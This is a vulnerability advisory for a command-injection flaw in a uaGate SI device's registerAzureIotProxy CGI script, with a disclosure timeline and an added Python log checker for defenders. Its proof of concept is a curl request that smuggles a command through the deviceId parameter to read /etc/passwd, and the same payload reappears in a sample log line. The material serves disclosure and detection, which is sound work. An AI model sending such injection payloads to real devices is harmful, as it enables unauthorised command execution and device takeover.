A CGI script of the uaGate SI handles its parameters in an unsafe fashion. Maliciously crafted URL parameters can transfer an arbitrary command payload that is executed with the rights of the web server. The command output written to stdout is returned by the web server in response to the malicious web request.
An authenticated attacker can execute arbitrary commands by issuing a web request.
Proof of concept details
curl --silent --user itadmin:******* 'http://uagate/cgi-bin/it/registerAzureIotProxy.cgi?task=register&deviceId=%26cat%20/etc/passwd%26' | cat | head -n 30
This exploit can be used in an exploit chain together with a privilege escalation vulnerability to gain complete control over the target device.
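For defenders, a log check for this issue, written as an added example that is not part of the original advisory or the vendor's code: it flags requests to the affected CGI whose decoded deviceId falls outside an allow-list. The allow-list, the Common Log Format layout and the second CGI path are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed policy: device IDs are 1-128 characters of letters, digits, '.', '_', '-'.
# Adjust to the naming scheme actually used for your devices.
SAFE_DEVICE_ID = re.compile(r"[A-Za-z0-9._-]{1,128}")
CGI_PATH = "/cgi-bin/it/registerAzureIotProxy.cgi"  # path taken from the advisory
# Request line inside a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def is_safe_device_id(value):
    """True only if the whole value matches the allow-list."""
    return SAFE_DEVICE_ID.fullmatch(value) is not None

def suspicious_device_ids(log_lines):
    """Return (line_number, decoded deviceId) for requests to the affected CGI
    whose deviceId parameter falls outside the allow-list."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if target.path != CGI_PATH:
            continue
        # parse_qs splits on '&' first and percent-decodes afterwards, so an
        # encoded %26 ends up inside the value, as it does on the device.
        params = parse_qs(target.query, keep_blank_values=True)
        for value in params.get("deviceId", []):
            if not is_safe_device_id(value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (Common Log Format assumed; other.cgi is hypothetical).
SAMPLE_LOG = [
    '192.0.2.10 - itadmin [07/Aug/2019:10:00:01 +0000] "GET /cgi-bin/it/registerAzureIotProxy.cgi?task=register&deviceId=gateway-01 HTTP/1.1" 200 120',
    '192.0.2.44 - itadmin [07/Aug/2019:10:02:13 +0000] "GET /cgi-bin/it/registerAzureIotProxy.cgi?task=register&deviceId=%26cat%20/etc/passwd%26 HTTP/1.1" 200 1843',
    '192.0.2.10 - itadmin [07/Aug/2019:10:03:40 +0000] "GET /cgi-bin/it/other.cgi?deviceId=%26x HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    for number, value in suspicious_device_ids(SAMPLE_LOG):
        print(f"line {number}: rejected deviceId {value!r}")
```

The same allow-list test, applied inside the CGI before the value reaches any command invocation, is the corresponding input-validation control.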
- day 0 - pentest of uaGate SI Device - 21.12.2018
- day 28 - initial issue related contact to manufacturer - 18.01.2019
- day 63 - issue report to manufacturer - 22.02.2019
- day 66 - secure communication channel established - 25.02.2019
- day 74 - detailed issue report to manufacturer - 05.03.2019
- day 116 - manufacturer acknowledged security issues - 16.04.2019
- day 125 - CVE ID issued by MITRE - 25.04.2019
- day 229 - fix found in Firmware 1.71.00.1225 - 07.08.2019
- day 293 - released - 10.10.2019